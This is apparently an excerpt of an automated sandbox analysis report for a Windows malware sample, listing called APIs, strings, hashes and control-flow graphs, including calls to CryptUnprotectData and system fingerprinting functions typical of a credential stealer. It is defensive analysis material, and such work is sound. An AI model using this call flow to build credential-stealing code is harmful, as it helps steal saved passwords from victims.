            • WriteConsoleW.KERNEL32(00000010,00000000,00FC3A70,00000000,?,00FB4EA2,00000010,00000001,00000010,?,?,00FAC193,?,00000010,00000000,?), ref: 00FB66CE
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
            • String ID:
            • API String ID: 2744216297-0
            • Opcode ID: af26790eb47d6f011b831a7bca499d6d06a719884c67db7e85788be8ed8c4311
            • Instruction ID: fe753c3a4aff16cbeb290327d72b85af6651e9c1d7193ec562ccad9f8b138846
            • Opcode Fuzzy Hash: af26790eb47d6f011b831a7bca499d6d06a719884c67db7e85788be8ed8c4311
            • Instruction Fuzzy Hash: 78F09836500228BBCF622F96DC499D93F26FB587A1F144520FA19DA130D6369860BF91
            APIs
              • Part of subcall function 00F94E90: std::_Lockit::_Lockit.LIBCPMT ref: 00F94E9D
              • Part of subcall function 00F94E90: std::_Lockit::_Lockit.LIBCPMT ref: 00F94EB7
              • Part of subcall function 00F94E90: std::_Lockit::~_Lockit.LIBCPMT ref: 00F94ED8
              • Part of subcall function 00F94E90: std::_Lockit::~_Lockit.LIBCPMT ref: 00F94F04
            • OffsetRect.USER32(00000000,00000000,00000000), ref: 00FB931F
              • Part of subcall function 00F94E90: std::_Lockit::~_Lockit.LIBCPMT ref: 00F94F39
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Lockitstd::_$Lockit::~_$Lockit::_$OffsetRect
            • String ID: 0$Zatlat
            • API String ID: 2708111867-1547964091
            • Opcode ID: 2726f4c26feef93adad07dee9dd7c7701a7f90a662bfcd9f3014d14f71fab4e4
            • Instruction ID: 6642170bce584bb5379c0b6eb8a37c6eb4642933d141e54f2ee5f0b70fe9cbd9
            • Opcode Fuzzy Hash: 2726f4c26feef93adad07dee9dd7c7701a7f90a662bfcd9f3014d14f71fab4e4
            • Instruction Fuzzy Hash: 94E1BD706083409FE714DF24C895B6ABBE1BFC9308F18496CF5898B392DB75E845DB82
            APIs
            • ___std_exception_copy.LIBVCRUNTIME ref: 00F922CD
              • Part of subcall function 00F9BC00: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F9BB23,?,?,?,?,00F9BB23,?,00FC40FC,?), ref: 00F9BC60
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: ExceptionRaise___std_exception_copy
            • String ID: ios_base::badbit set$ios_base::failbit set
            • API String ID: 3109751735-1240500531
            • Opcode ID: 955c686176c8b0f86e8d622b459b8a68b62f8f04bc900e23bd3deeac130881bc
            • Instruction ID: d28405a149a7a36a35a7ade7135b7d1e14321ecc39d134fcca056a2dad03e1f8
            • Opcode Fuzzy Hash: 955c686176c8b0f86e8d622b459b8a68b62f8f04bc900e23bd3deeac130881bc
            • Instruction Fuzzy Hash: E9410472904304AFEB04DF28CC41EAEB7E8BF89310F14861EF95587251E774E945DB92
            APIs
            • ___except_validate_context_record.LIBVCRUNTIME ref: 00F9DFDF
            • __IsNonwritableInCurrentImage.LIBCMT ref: 00F9E093
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 3480331319-1018135373
            • Opcode ID: c13c3fb1257373cb06ac920d1bc647d7aea9ca8e0c6519b9ebe6f17045601cb9
            • Instruction ID: 72b19e0d2e058cae23026ed0bffeb506470bdf5762e8eb5b5c6de64372a17729
            • Opcode Fuzzy Hash: c13c3fb1257373cb06ac920d1bc647d7aea9ca8e0c6519b9ebe6f17045601cb9
            • Instruction Fuzzy Hash: 6A41B130E00209DBEF10DF68CC81A9EBBB5BF44324F148155E8159B3A2D776E955EB91
            APIs
            • EncodePointer.KERNEL32(00000000,?), ref: 00F9E8D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID: MOC$RCC
            • API String ID: 2118026453-2084237596
            • Opcode ID: ad4f8707d14f69d704fe9646e998b1dd0091eeeaae70592984cd7c7a5879bc87
            • Instruction ID: 6dea8771b2d75dd5fc7c1061502f6e9f58cbbca4f804e05929ef7823c3c00f0b
            • Opcode Fuzzy Hash: ad4f8707d14f69d704fe9646e998b1dd0091eeeaae70592984cd7c7a5879bc87
            • Instruction Fuzzy Hash: EB414871D00209AFEF16DF98CD81AAEBBB5BF48310F148099F908A7222D3359A50EB51
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 00F919B5
            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F919FA
              • Part of subcall function 00F99095: _Yarn.LIBCPMT ref: 00F990B4
              • Part of subcall function 00F99095: _Yarn.LIBCPMT ref: 00F990D8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1762035524.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
            • Associated: 00000000.00000002.1762024067.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762055936.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762069605.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1762099795.0000000001012000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f90000_qeUaxJCA3FO.jbxd
            Similarity
            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
            • String ID: bad locale name
            • API String ID: 1908188788-1405518554
            • Opcode ID: ad3af30399574d703d322da7dde10cb0e45cea7a9dfe102c615db52ea75c00f6
            • Instruction ID: ba04cffa07a9d39e1ba335ee2856f7ce9a9a8fca23ce9cbd5afe61de12ca4899
            • Opcode Fuzzy Hash: ad3af30399574d703d322da7dde10cb0e45cea7a9dfe102c615db52ea75c00f6
            • Instruction Fuzzy Hash: F6F01D61515B408EE370DF798805747BAE0AF25710F044A1DD4CAC7A51E379E508CBA6

            Execution Graph

            Execution Coverage:15.1%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:27.7%
            Total number of Nodes:296
            Total number of Limit Nodes:17
            execution_graph 10960 41a941 10961 41a950 10960->10961 10964 43a9d0 10961->10964 10965 43aa02 10964->10965 10968 43aa7e 10965->10968 10970 437520 LdrInitializeThunk 10965->10970 10966 41a97a 10968->10966 10971 437520 LdrInitializeThunk 10968->10971 10970->10968 10971->10966 10972 431cc2 10973 431cc7 10972->10973 10976 43a540 10973->10976 10975 431cf7 10978 43a560 10976->10978 10977 43a6ae 10977->10975 10978->10977 10980 437520 LdrInitializeThunk 10978->10980 10980->10977 11213 41d080 11214 41d08c 11213->11214 11216 41d0e0 11213->11216 11214->11214 11215 41b3b0 LdrInitializeThunk 11214->11215 11215->11216 10981 4209c0 10982 420b56 10981->10982 10998 43ad80 10982->10998 10985 420d06 10992 420f56 10985->10992 10993 420df3 10985->10993 10997 420c01 10985->10997 11008 43b820 10985->11008 10986 420cb5 10986->10985 10988 43ad80 LdrInitializeThunk 10986->10988 10986->10992 10986->10993 10986->10997 10988->10985 10990 420bf0 10990->10985 10990->10986 10990->10992 10990->10993 10990->10997 11002 43aec0 10990->11002 10991 420de0 10991->10992 10991->10993 10991->10997 10992->10997 11021 437520 LdrInitializeThunk 10992->11021 11020 437520 LdrInitializeThunk 10993->11020 11000 43ada0 10998->11000 10999 420bc4 10999->10985 10999->10986 10999->10990 10999->10992 10999->10993 10999->10997 11014 43b1a0 10999->11014 11000->10999 11022 437520 LdrInitializeThunk 11000->11022 11003 43aef2 11002->11003 11004 43af6e 11003->11004 11023 437520 LdrInitializeThunk 11003->11023 11007 43b05e 11004->11007 11024 437520 LdrInitializeThunk 11004->11024 11007->10986 11007->11007 11009 43b840 11008->11009 11009->11009 11011 43b8fe 11009->11011 11025 437520 LdrInitializeThunk 11009->11025 11013 43b9f2 11011->11013 11026 437520 LdrInitializeThunk 11011->11026 11013->10991 11015 43b1d2 11014->11015 11017 43b24e 11015->11017 11027 437520 LdrInitializeThunk 11015->11027 11019 43b332 11017->11019 11028 437520 LdrInitializeThunk 11017->11028 11019->10990 11020->10997 11021->10997 11022->10999 11023->11004 11024->11007 11025->11011 11026->11013 11027->11017 11028->11019 11029 417742 11031 4176f0 11029->11031 11033 4178be 11029->11033 11034 41775a 11029->11034 11031->11029 11031->11033 11031->11034 11036 433410 11031->11036 11039 415b10 11031->11039 11033->11033 11034->11033 11055 41b3b0 11034->11055 11037 43a540 LdrInitializeThunk 11036->11037 11038 43344c 11037->11038 11040 415b30 11039->11040 11041 43a540 LdrInitializeThunk 11040->11041 11042 415bea 11041->11042 11043 415ea1 11042->11043 11044 415e87 11042->11044 11045 415e6a 11042->11045 11046 415e5a 11042->11046 11052 415bf9 11042->11052 11053 415cf6 11042->11053 11059 43a8c0 11042->11059 11050 43a9d0 LdrInitializeThunk 11043->11050 11049 43a9d0 LdrInitializeThunk 11044->11049 11045->11043 11045->11044 11045->11052 11045->11053 11047 43a8c0 LdrInitializeThunk 11046->11047 11047->11045 11049->11043 11051 415ec0 11050->11051 11052->11031 11053->11052 11058 437520 LdrInitializeThunk 11053->11058 11064 41b4b0 11055->11064 11058->11052 11061 43a8f4 11059->11061 11060 43a978 11060->11046 11061->11060 11063 437520 LdrInitializeThunk 11061->11063 11063->11060 11065 43a540 LdrInitializeThunk 11064->11065 11066 41b506 11065->11066 11067 416448 11068 41644d 11067->11068 11069 43a8c0 LdrInitializeThunk 11068->11069 11072 41645e 11069->11072 11070 4164b4 11077 4164db 11070->11077 11080 401f30 11070->11080 11072->11070 11073 43a9d0 LdrInitializeThunk 11072->11073 11072->11077 11078 41646d 11072->11078 11073->11070 11075 416ac6 CryptUnprotectData 11076 416ae5 11075->11076 11075->11078 11077->11075 11078->11076 11079 437520 LdrInitializeThunk 11078->11079 11079->11076 11081 401f5c 11080->11081 11084 401f38 11080->11084 11081->11077 11083 401f5b 11083->11077 11085 401f60 11084->11085 11086 401f75 11085->11086 11089 401fba 11085->11089 11087 402127 11086->11087 11086->11089 11095 402175 11086->11095 11096 403520 11087->11096 11089->11083 11090 402fd0 RtlFreeHeap 11090->11089 11091 401f60 RtlFreeHeap 11091->11095 11092 402354 11092->11089 11092->11090 11093 402664 11100 402fd0 11093->11100 11095->11089 11095->11091 11095->11092 11095->11093 11097 40379f 11096->11097 11098 403534 11096->11098 11097->11089 11098->11097 11109 4352b2 RtlFreeHeap 11098->11109 11101 4030e7 11100->11101 11102 402fde 11100->11102 11103 4030ae 11102->11103 11104 403033 11102->11104 11105 402ff3 11102->11105 11103->11104 11106 402fd0 RtlFreeHeap 11103->11106 11110 4352b2 RtlFreeHeap 11104->11110 11105->11101 11105->11104 11107 402fd0 RtlFreeHeap 11105->11107 11106->11103 11107->11105 11109->11097 11110->11101 11217 428008 11218 428045 11217->11218 11219 428493 GetPhysicallyInstalledSystemMemory 11218->11219 11220 4284ae 11219->11220 11221 41c98a 11222 41c998 11221->11222 11226 41cc60 11222->11226 11238 4205f0 11222->11238 11223 41ca0c 11227 41cd40 11226->11227 11228 41cc76 11226->11228 11227->11223 11228->11227 11228->11228 11229 43a540 LdrInitializeThunk 11228->11229 11230 41ce2d 11229->11230 11231 433410 LdrInitializeThunk 11230->11231 11234 41ce6a 11230->11234 11232 41ce4f 11231->11232 11232->11227 11233 43a540 LdrInitializeThunk 11232->11233 11233->11234 11234->11227 11235 43a9d0 LdrInitializeThunk 11234->11235 11237 41ce90 11235->11237 11237->11227 11242 437520 LdrInitializeThunk 11237->11242 11239 420760 11238->11239 11240 420609 11238->11240 11239->11223 11241 41b3b0 LdrInitializeThunk 11240->11241 11241->11239 11242->11227 11243 40fe8f GetSystemDirectoryW 11244 40fed0 11243->11244 11245 409890 11248 409899 11245->11248 11246 4098aa 11247 4098eb ExitProcess 11246->11247 11248->11246 11249 4098b5 11248->11249 11254 40a9c0 11248->11254 11261 4373e0 11249->11261 11252 4098bc 11252->11249 11260 40c980 FreeLibrary 11252->11260 11255 40a9fc 11254->11255 11256 40ab3c LoadLibraryExW 11255->11256 11258 40ab79 11256->11258 11257 40aecb GetProcessVersion 11259 40ab83 11257->11259 11258->11257 11258->11259 11259->11252 11260->11249 11264 4390b0 11261->11264 11263 4373e5 FreeLibrary 11263->11247 11265 4390b9 11264->11265 11265->11263 11111 42e850 11112 42e886 KiUserCallbackDispatcher GetSystemMetrics 11111->11112 11113 42e8cf DeleteObject 11112->11113 11115 42e92e SelectObject 11113->11115 11117 42e9ca SelectObject 11115->11117 11118 42e9f3 DeleteObject 11117->11118 11266 413313 11267 413320 11266->11267 11268 41b3b0 LdrInitializeThunk 11267->11268 11269 413409 11268->11269 11270 410115 11271 410156 11270->11271 11272 402fd0 RtlFreeHeap 11271->11272 11273 4102a1 11272->11273 11286 41de10 11273->11286 11275 4102ba 11296 41e5a0 11275->11296 11277 4102da 11278 41e7e0 LdrInitializeThunk 11277->11278 11279 4102fa 11278->11279 11280 421510 LdrInitializeThunk 11279->11280 11281 410323 11280->11281 11282 4219a0 LdrInitializeThunk 11281->11282 11283 41032c 11282->11283 11284 42e680 6 API calls 11283->11284 11285 410375 11284->11285 11287 41de90 11286->11287 11288 43a700 LdrInitializeThunk 11287->11288 11293 41e097 11288->11293 11289 41e264 11290 41b4b0 LdrInitializeThunk 11289->11290 11291 41e3be 11289->11291 11295 41e548 11289->11295 11290->11291 11291->11291 11292 41b3b0 LdrInitializeThunk 11291->11292 11292->11295 11293->11289 11293->11291 11294 43a700 LdrInitializeThunk 11293->11294 11294->11289 11295->11275 11297 41e65a 11296->11297 11298 418d70 LdrInitializeThunk 11297->11298 11299 41e7b7 11298->11299 11305 42ba9a 11306 42bbd3 SysAllocString 11305->11306 11307 42bb7f 11305->11307 11308 42bc3f 11306->11308 11307->11306 11309 403520 11310 40379f 11309->11310 11311 403534 11309->11311 11311->11310 11313 4352b2 RtlFreeHeap 11311->11313 11313->11310 11314 4371a2 11316 4371e4 11314->11316 11315 437290 LoadLibraryExW 11315->11316 11316->11315 11316->11316 11120 417e65 11121 417ea6 11120->11121 11122 415b10 LdrInitializeThunk 11121->11122 11123 417f17 11122->11123 11124 415b10 LdrInitializeThunk 11123->11124 11125 417ffa 11124->11125 11126 415b10 LdrInitializeThunk 11125->11126 11127 4180e2 11126->11127 11128 415b10 LdrInitializeThunk 11127->11128 11129 41819a 11128->11129 11129->11129 11130 427964 11132 427985 11130->11132 11131 427a4b FreeLibrary 11138 439800 11131->11138 11132->11131 11132->11132 11135 427b4b GetComputerNameExA 11137 427ba6 11135->11137 11136 427ac5 11136->11135 11136->11136 11139 427a6e GetComputerNameExA 11138->11139 11139->11136 11140 417266 11144 418770 11140->11144 11145 418816 11144->11145 11146 41b3b0 LdrInitializeThunk 11145->11146 11147 418c0b 11146->11147 11317 436baf GetLogicalDrives 11318 436bc2 11317->11318 11148 4116ef 11149 4116f8 11148->11149 11152 418d70 11149->11152 11151 41170f 11153 418d90 11152->11153 11158 43a700 11153->11158 11155 418e3f 11155->11151 11156 418de9 11156->11155 11157 41b4b0 LdrInitializeThunk 11156->11157 11157->11155 11160 43a720 11158->11160 11159 43a86e 11159->11156 11160->11159 11162 437520 LdrInitializeThunk 11160->11162 11162->11159 11319 4165af 11321 4165b5 11319->11321 11320 416d88 11321->11320 11323 437520 LdrInitializeThunk 11321->11323 11323->11320 11163 437d72 11164 437db7 11163->11164 11166 437e1e 11164->11166 11169 437520 LdrInitializeThunk 11164->11169 11168 437520 LdrInitializeThunk 11166->11168 11168->11166 11169->11166 11170 41acf0 11171 41ad48 11170->11171 11172 41acfe 11170->11172 11176 41ae00 11172->11176 11174 41adbc 11174->11171 11175 418f20 LdrInitializeThunk 11174->11175 11175->11171 11177 41ae60 11176->11177 11177->11177 11178 43a700 LdrInitializeThunk 11177->11178 11179 41af5d 11178->11179 11180 437470 11181 4374e3 RtlReAllocateHeap 11180->11181 11182 437497 11180->11182 11183 43750f 11181->11183 11182->11181 11182->11182 11184 4243f5 11188 42445c 11184->11188 11192 4242b0 11184->11192 11185 43a8c0 LdrInitializeThunk 11185->11192 11186 401f30 RtlFreeHeap 11186->11192 11187 402fd0 RtlFreeHeap 11187->11188 11188->11187 11191 4245cf 11188->11191 11194 437520 LdrInitializeThunk 11188->11194 11189 43a9d0 LdrInitializeThunk 11189->11192 11192->11184 11192->11185 11192->11186 11192->11188 11192->11189 11192->11192 11193 43a540 LdrInitializeThunk 11192->11193 11193->11192 11194->11188 11195 412af9 11196 412b06 11195->11196 11199 415ed0 11196->11199 11198 412b1d 11200 415f90 11199->11200 11201 43a540 LdrInitializeThunk 11200->11201 11204 41614c 11201->11204 11202 416178 11202->11198 11203 43a8c0 LdrInitializeThunk 11203->11204 11204->11202 11204->11203 11205 4161d2 11204->11205 11206 43a9d0 LdrInitializeThunk 11204->11206 11205->11202 11209 437520 LdrInitializeThunk 11205->11209 11206->11204 11208 4166df 11209->11208 11210 43317d 11211 43319d 11210->11211 11212 4331e0 GetVolumeInformationW 11211->11212

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
            • String ID: $!B$kB
            • API String ID: 1449868515-3557054983
            • Opcode ID: bd39a01542d00d1a83a77da0cb9eff0b69358de462bca32c710ca54e28559403
            • Instruction ID: 7b228ac64cae03dbf5c3084e89f25bc7f722e4dabb8f8aadbcccb54589869964
            • Opcode Fuzzy Hash: bd39a01542d00d1a83a77da0cb9eff0b69358de462bca32c710ca54e28559403
            • Instruction Fuzzy Hash: 0AA17EB05093809FE760EF69D54978ABBF0BB85748F41892DE4D88B350D7B89548CF8B

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 196 417742-417747 197 4176f0-417705 196->197 198 417763-417774 196->198 199 4178c4-417960 196->199 200 417a19-417ab5 196->200 201 41775a-41775c 196->201 202 41777d-417792 call 409230 196->202 203 41770c-41772e call 433410 call 415b10 196->203 204 41774e-417753 196->204 205 4178be 196->205 197->198 197->199 197->200 197->201 197->202 197->203 197->205 198->202 210 417962 199->210 211 4179be-4179c3 199->211 208 417ab7 200->208 209 417b0e-417b14 200->209 201->198 201->199 201->200 201->202 201->205 219 417b64 202->219 220 417799-417819 202->220 227 417733-41773f 203->227 204->198 204->199 204->200 204->201 204->202 204->203 204->205 215 417ac0-417b0c 208->215 216 417b20-417b27 209->216 217 417970-4179bc 210->217 212 4179d0-4179d6 211->212 212->212 218 4179d8-4179df 212->218 215->209 215->215 216->216 222 417b29-417b30 216->222 217->211 217->217 223 417a01-417a04 218->223 224 4179e1-4179e6 218->224 228 417e5b-417e64 219->228 225 417865-417897 220->225 226 41781b 220->226 229 417a10 222->229 230 417b36-417b38 222->230 223->200 232 4179f0-4179fb 224->232 234 4178a0-4178a9 225->234 233 417820-417863 226->233 227->196 229->200 231 417b40-417b4b 230->231 231->231 235 417b4d-417b4f 231->235 232->232 236 4179fd-4179ff 232->236 233->225 233->233 234->234 237 4178ab-417b7f call 409220 234->237 235->219 235->229 236->223 242 417ba1-417bb1 237->242 243 417b81-417b88 237->243 245 417bd1-417c2f 242->245 246 417bb3-417bba 242->246 244 417b90-417b9f 243->244 244->242 244->244 248 417c31 245->248 249 417c82-417caa 245->249 247 417bc0-417bcf 246->247 247->245 247->247 250 417c40-417c80 248->250 251 417cb0-417cb9 249->251 250->249 250->250 251->251 252 417cbb-417cc3 251->252 253 417cd0-417cd9 252->253 253->253 254 417cdb-417d08 call 409220 253->254 259 417d21-417d38 254->259 260 417d0a-417d0f 254->260 263 417d40-417d4f 259->263 261 417d10-417d1f 260->261 261->259 261->261 263->263 264 417d51-417d64 263->264 266 417d81-417db2 264->266 267 417d66-417d6a 264->267 269 417db4 266->269 270 417e0d-417e33 call 41b3b0 266->270 268 417d70-417d7f 267->268 268->266 268->268 271 417dc0-417e0b 269->271 270->228 271->270 271->271
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: ;~A$BwA$GEFN$LH$_\[T$oASS$s@LE
            • API String ID: 0-916928889
            • Opcode ID: 79232cd0066df9e2e129c86352673664cac949339768f666b437c6eb5fbec4d8
            • Instruction ID: 40f2763a7dd482196709f3d8a6d99116c5087e190a1fb18e28f7f65fb865f72a
            • Opcode Fuzzy Hash: 79232cd0066df9e2e129c86352673664cac949339768f666b437c6eb5fbec4d8
            • Instruction Fuzzy Hash: 530279B054C3908BD324CF14D89076BBBF1EF86398F14891DE8D99B3A1D7789985CB86

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 274 40a2d0-40a2e3 275 40a324-40a326 274->275 276 40a2e5-40a2f1 274->276 279 40a9b3-40a9bc 275->279 277 40a2f3-40a2f5 276->277 278 40a32b-40a338 276->278 280 40a2f7-40a322 277->280 281 40a33a-40a341 277->281 282 40a372-40a3d4 call 407180 call 433040 call 409220 278->282 284 40a343-40a35b 280->284 281->284 285 40a35d-40a36d 281->285 291 40a3d6 282->291 292 40a42d-40a462 call 409bc0 282->292 284->282 285->282 293 40a3e0-40a42b 291->293 296 40a464 292->296 297 40a4b5-40a4fa call 409bc0 292->297 293->292 293->293 298 40a470-40a4b3 296->298 301 40a541-40a593 call 409bc0 297->301 302 40a4fc-40a4ff 297->302 298->297 298->298 306 40a595 301->306 307 40a5dd-40a601 301->307 303 40a500-40a53f 302->303 303->301 303->303 308 40a5a0-40a5db 306->308 309 40a603 307->309 310 40a65a-40a698 call 409bc0 307->310 308->307 308->308 311 40a610-40a658 309->311 314 40a702-40a888 call 409e90 310->314 315 40a69a 310->315 311->310 311->311 319 40a8d2-40a908 314->319 320 40a88a 314->320 317 40a6a0-40a700 315->317 317->314 317->317 322 40a977-40a99e call 40e520 call 409230 319->322 323 40a90a 319->323 321 40a890-40a8d0 320->321 321->319 321->321 328 40a9a3-40a9ac 322->328 324 40a910-40a975 323->324 324->322 324->324 328->279
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID:
            • String ID: 0$9t$:$E%$Ih$L$`{
            • API String ID: 0-3077212884
            • Opcode ID: e50989ff2db25c109be629db5ff1ba799cb44dc35e1273fb72090efa36a27a9f
            • Instruction ID: aeeb7b59046e96cab70ba4daa5842abb78eeeec13de71bf8ef1686692547ab2d
            • Opcode Fuzzy Hash: e50989ff2db25c109be629db5ff1ba799cb44dc35e1273fb72090efa36a27a9f
            • Instruction Fuzzy Hash: 280233B0608381AFD714CF14C590B6BBBE2ABC5708F449D2DE4D98B292D778D949CB47

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 368 427964-4279cc call 439800 372 427a0e-427a18 368->372 373 4279ce-4279cf 368->373 375 427a1a-427a1b 372->375 376 427a2b-427a36 372->376 374 4279d0-427a0c 373->374 374->372 374->374 377 427a20-427a29 375->377 378 427a4b-427ac3 FreeLibrary call 439800 GetComputerNameExA 376->378 379 427a38-427a39 376->379 377->376 377->377 383 427b05-427b0f 378->383 384 427ac5 378->384 380 427a40-427a49 379->380 380->378 380->380 385 427b11-427b12 383->385 386 427b2b-427b39 383->386 387 427ad0-427b03 384->387 388 427b20-427b29 385->388 389 427b4b-427ba4 GetComputerNameExA 386->389 390 427b3b-427b3f 386->390 387->383 387->387 388->386 388->388 392 427be2-427bec 389->392 393 427ba6 389->393 391 427b40-427b49 390->391 391->389 391->391 395 427bf2-427bf9 392->395 396 427c79 392->396 394 427bb0-427be0 393->394 394->392 394->394 397 427c00-427c09 395->397 398 427c7f-427c8d 396->398 397->397 399 427c0b 397->399 400 427c9b-427ce8 398->400 401 427c8f 398->401 399->398 404 427cea 400->404 405 427d38-427d42 400->405 402 427c90-427c99 401->402 402->400 402->402 406 427cf0-427d36 404->406 407 427d44-427d45 405->407 408 427d5b-427d63 405->408 406->405 406->406 409 427d50-427d59 407->409 410 427d65-427d66 408->410 411 427d7b-427de2 call 439800 408->411 409->408 409->409 412 427d70-427d79 410->412 416 427de4 411->416 417 427e3b-427e45 411->417 412->411 412->412 418 427df0-427e39 416->418 419 427e47-427e48 417->419 420 427e5b-427e71 417->420 418->417 418->418 421 427e50-427e59 419->421 422 427e96-427e9f 420->422 421->420 421->421 423 427f30-427f7b 422->423 424 427ea5-427eac 422->424 425 427fc7-427fcc 423->425 426 427f7d-427f7f 423->426 427 427e80-427e82 424->427 428 427eae-427ec5 424->428 430 427fdb-427fe3 call 42bf60 425->430 431 427fce-427fcf 425->431 429 427f80-427fc5 426->429 432 427e87-427e90 427->432 433 427ef0-427efb 428->433 434 427ec7-427eca 428->434 429->425 429->429 440 427fe8-428005 430->440 435 427fd0-427fd9 431->435 432->422 437 427f2c-427f2e 432->437 433->432 439 427efd-427f27 433->439 434->433 438 427ecc-427eea 434->438 435->430 435->435 437->423 438->432 439->432
            APIs
            • FreeLibrary.KERNEL32(?), ref: 00427A58
            • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00427A92
            • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00427B72
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1767993098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName$FreeLibrary
            • String ID: L-
            • API String ID: 2243422189-1489653379
            • Opcode ID: 800cc9087ea37f5dc664a1c6be6314c24e1182209b8a3adbe97bac99e018499e
            • Instruction ID: 5ab1a77e48bd28dff27f93b1677b56afa0827e1326ac238dade5fb95bf83114d
            • Opcode Fuzzy Hash: 800cc9087ea37f5dc664a1c6be6314c24e1182209b8a3adbe97bac99e018499e
            • Instruction Fuzzy Hash: 76126B742047818FE325CF29C4A0B22BBF1FF5A304F68899DD4D68B792D739A845CB94

            Control-flow Graph

            • Executed
            • Not Executed
